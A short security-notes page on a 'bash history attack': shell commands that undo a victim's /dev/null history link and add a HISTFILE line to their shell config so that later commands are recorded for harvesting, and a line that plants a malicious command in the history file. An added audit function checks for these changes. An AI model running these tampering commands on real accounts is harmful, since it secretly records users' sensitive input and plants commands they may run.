Bash History Attack
Last modified: 2023-07-24
If an attacker can log in as the victim user on a system, they can exploit the bash history in the victim's home directory.
Bash History Unveiling
.bash_history is commonly in the user's home directory. To avoid storing the bash history, users can link this file to /dev/null as below.
# If victim uses bash...
ln -sf /dev/null ~/.bash_history
# If victim uses zsh...
ln -sf /dev/null ~/.zsh_history
Exploitation
If attackers can log in as the victim user, they can unlink /dev/null and then allow the bash history to be stored. If the HISTFILE variable does not appear in .bashrc or .profile, attackers can add this line to the file to store the bash history.
# If victim uses bash...
unlink ~/.bash_history ; touch ~/.bash_history
echo "HISTFILE=~/.bash_history" >> ~/.bashrc
# If victim uses zsh...
unlink ~/.zsh_history ; touch ~/.zsh_history
echo "HISTFILE=~/.zsh_history" >> ~/.zshrc
After rebooting the machine, the bash history will be stored in the .bash_history file, and attackers can see the history when they log in again. They may extract sensitive information from it.
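A check a user or administrator can run to spot the changes described above, as an added example that is not part of the original page: it reports whether each history file is still a symlink to /dev/null and lists any HISTFILE assignment in .bashrc, .profile or .zshrc. The function name and output labels are assumptions made for this example.

```shell
# Added example: audit one home directory for the history changes described
# above. The function name and output labels are hypothetical.
# Usage: audit_history_home /home/alice   (defaults to $HOME)
audit_history_home() (
    home="${1:-$HOME}"
    for f in .bash_history .zsh_history; do
        if [ -L "$home/$f" ]; then
            target=$(readlink "$home/$f")
            if [ "$target" = "/dev/null" ]; then
                echo "OK $f -> /dev/null (history is discarded)"
            else
                echo "WARN $f is a symlink to $target"
            fi
        elif [ -f "$home/$f" ]; then
            echo "WARN $f is a regular file (history is being recorded)"
        else
            echo "INFO $f not present"
        fi
    done
    # List every HISTFILE assignment in the startup files, with line numbers,
    # so an appended line stands out.
    for rc in .bashrc .profile .zshrc; do
        [ -f "$home/$rc" ] || continue
        grep -nE '^[[:space:]]*(export[[:space:]]+)?HISTFILE=' "$home/$rc" |
            while IFS= read -r hit; do
                echo "REVIEW $rc:$hit"
            done
    done
    exit 0
)
```

A WARN on a history file that was previously linked to /dev/null, together with a REVIEW line the user did not write, matches the modification shown in this section.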
False Information Inserting
Attackers can easily insert arbitrary content into .bash_history as follows.
# Assume `malicious` is a malicious binary.
echo "~/malicious" >> ~/.bash_history
When the victim views the content of the bash_history, the malicious command may be executed because of the victim's misunderstanding.